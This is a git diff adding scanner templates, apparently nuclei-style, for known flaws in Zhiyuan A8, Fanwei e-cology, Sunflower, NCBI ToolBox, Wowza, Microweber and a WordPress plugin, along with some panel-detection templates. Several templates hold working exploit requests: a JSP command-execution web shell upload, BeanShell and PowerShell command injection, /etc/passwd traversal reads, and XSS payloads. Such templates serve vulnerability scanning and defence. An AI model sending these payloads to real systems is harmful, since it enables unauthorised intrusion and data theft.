Merge branch 'master' into dashboard

.new-additions

@@ -1,14 +1,23 @@
+cnvd/2019/CNVD-2019-19299.yaml
+cnvd/2019/CNVD-2019-32204.yaml
 cnvd/2021/CNVD-2021-09650.yaml
 cnvd/2021/CNVD-2021-15824.yaml
+cnvd/2022/CNVD-2022-03672.yaml
 cves/2017/CVE-2017-18598.yaml
+cves/2018/CVE-2018-16716.yaml
+cves/2018/CVE-2018-19365.yaml
 cves/2019/CVE-2019-9726.yaml
 cves/2021/CVE-2021-24762.yaml
 cves/2021/CVE-2021-41192.yaml
 cves/2022/CVE-2022-21371.yaml
 cves/2022/CVE-2022-23134.yaml
+exposed-panels/casdoor-login.yaml
 exposed-panels/homematic-panel.yaml
 exposed-panels/phoronix-pane;.yaml
 exposed-panels/raspberrymatic-panel.yaml
 exposed-panels/redash-panel.yaml
 technologies/empirecms-detect.yaml
+technologies/microweber-detect.yaml
 technologies/snipeit-panel.yaml
+vulnerabilities/other/microweber-xss.yaml
+vulnerabilities/wordpress/wp-adaptive-xss.yaml

cnvd/2019/CNVD-2019-19299.yaml

@@ -0,0 +1,47 @@
+id: CNVD-2019-19299
+
+info:
+  name: Zhiyuan A8 Arbitrary File Writing to Remote Code Execution
+  author: daffainfo
+  severity: critical
+  reference:
+    - https://www.cxyzjd.com/article/guangying177/110177339
+    - https://github.com/sectestt/CNVD-2019-19299
+  tags: zhiyuan,cnvd,cnvd2019,rce
+
+requests:
+  - raw:
+      - |
+        POST /seeyon/htmlofficeservlet HTTP/1.1
+        Host: {{Hostname}}
+        Pragma: no-cache
+        Cache-Control: no-cache
+        Upgrade-Insecure-Requests: 1
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
+        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+        Connection: close
+
+        DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
+        OPTION=S3WYOSWLBSGr
+        currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
+        = WUghPB3szB3Xwg66 the CREATEDATE
+        recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
+        originalFileId = wV66
+        originalCreateDate = wUghPB3szB3Xwg66
+        FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
+        needReadFile = yRWZdAS6
+        originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
+        <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
+
+      - |
+        GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(body_1, "htmoffice operate")'
+          - 'contains(body_2, "Windows IP")'
+        condition: and

cnvd/2019/CNVD-2019-32204.yaml

@@ -0,0 +1,23 @@
+id: CNVD-2019-32204
+
+info:
+  name: Fanwei e-cology <= 9.0 Remote Code Execution
+  author: daffainfo
+  severity: critical
+  description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
+  reference: https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
+  tags: fanwei,cnvd,cnvd2019,rce
+
+requests:
+  - raw:
+      - |
+        POST /bsh.servlet.BshServlet HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
+
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"

cnvd/2022/CNVD-2022-03672.yaml

@@ -0,0 +1,42 @@
+id: CNVD-2022-03672
+
+info:
+  name: Sunflower Simple and Personal edition RCE
+  author: daffainfo
+  severity: critical
+  reference:
+    - https://www.1024sou.com/article/741374.html
+    - https://copyfuture.com/blogs-details/202202192249158884
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
+  tags: cnvd,cnvd2020,sunflower,rce
+
+requests:
+  - raw:
+      - |
+        POST /cgi-bin/rpc HTTP/1.1
+        Host: {{Hostname}}
+
+        action=verify-haras
+      - |
+        GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: CID={{cid}}
+
+    extractors:
+      - type: regex
+        name: cid
+        internal: true
+        group: 1
+        regex:
+          - '"verify_string":"(.*)"'
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1==200"
+          - "status_code_2==200"
+          - "contains(body_1, 'verify_string')"
+          - "contains(body_2, 'Windows IP')"
+        condition: and

cves/2018/CVE-2018-16716.yaml

@@ -0,0 +1,30 @@
+id: CVE-2018-16716
+info:
+  name: NCBI ToolBox - Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  description: A path traversal vulnerability exists in viewcgi.c in the 2.0.7 through 2.2.26 legacy versions of the NCBI ToolBox, which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.
+  reference:
+    - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-16716
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2018-16716
+    cwe-id: CWE-22
+  tags: cve,cve2018,ncbi,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

cves/2018/CVE-2018-19365.yaml

@@ -0,0 +1,31 @@
+id: CVE-2018-19365
+info:
+  name: Wowza Streaming Engine Manager Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  description: The REST API in Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request
+  reference:
+    - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
+    - https://www.cvedetails.com/cve/CVE-2018-19365
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2018-19365
+    cwe-id: CWE-22
+  tags: cve,cve2018,wowza,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200

exposed-panels/casdoor-login.yaml

@@ -0,0 +1,26 @@
+id: casdoor-login
+
+info:
+  name: Casdoor Login Panel
+  author: princechaddha
+  severity: info
+  metadata:
+    shodan-query: http.title:"Casdoor"
+  tags: panel,casdoor
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "<title>Casdoor</title>"
+
+      - type: status
+        status:
+          - 200

technologies/fingerprinthub-web-fingerprints.yaml

@@ -7605,6 +7605,11 @@ requests:
         words:
           - var reachclientproductname = "skype for business web 应用"
 
+      - type: word
+        name: microweber
+        words:
+          - '"generator" content="Microweber" />'
+
       - type: word
         name: mihalism-multi-host
         words:

technologies/microweber-detect.yaml

@@ -0,0 +1,26 @@
+id: microweber-detect
+
+info:
+  name: Microweber Detect
+  author: princechaddha
+  severity: info
+  reference: https://github.com/microweber/microweber
+  metadata:
+    shodan-query: 'http.favicon.hash:780351152'
+  tags: tech,microweber,oss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"generator" content="Microweber" />'
+
+      - type: status
+        status:
+          - 200

vulnerabilities/other/microweber-xss.yaml

@@ -0,0 +1,34 @@
+id: microweber-xss
+
+info:
+  name: Microweber XSS
+  author: gy741
+  severity: medium
+  description: Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.
+  reference:
+    - https://github.com/microweber/microweber/issues/809
+    - https://github.com/microweber/microweber
+  metadata:
+    shodan-query: 'http.favicon.hash:780351152'
+  tags: microweber,xss,oss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/editor_tools/module?type=files/admin"><script>alert(document.domain)</script>&params=filetype=images#path='
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script>" 0="filetype=images"'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

vulnerabilities/wordpress/wp-adaptive-xss.yaml

@@ -0,0 +1,33 @@
+id: wp-adaptive-xss
+
+info:
+  name: Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
+  author: dhiyaneshDK
+  severity: medium
+  description: The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue
+  reference:
+    - https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
+    - https://plugins.trac.wordpress.org/changeset/2655683
+  tags: wordpress,xss,wp-plugin,wp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<img/src/onerror=alert(document.domain)>'
+          - '<td>Image</td>'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'
+
+      - type: status
+        status:
+          - 200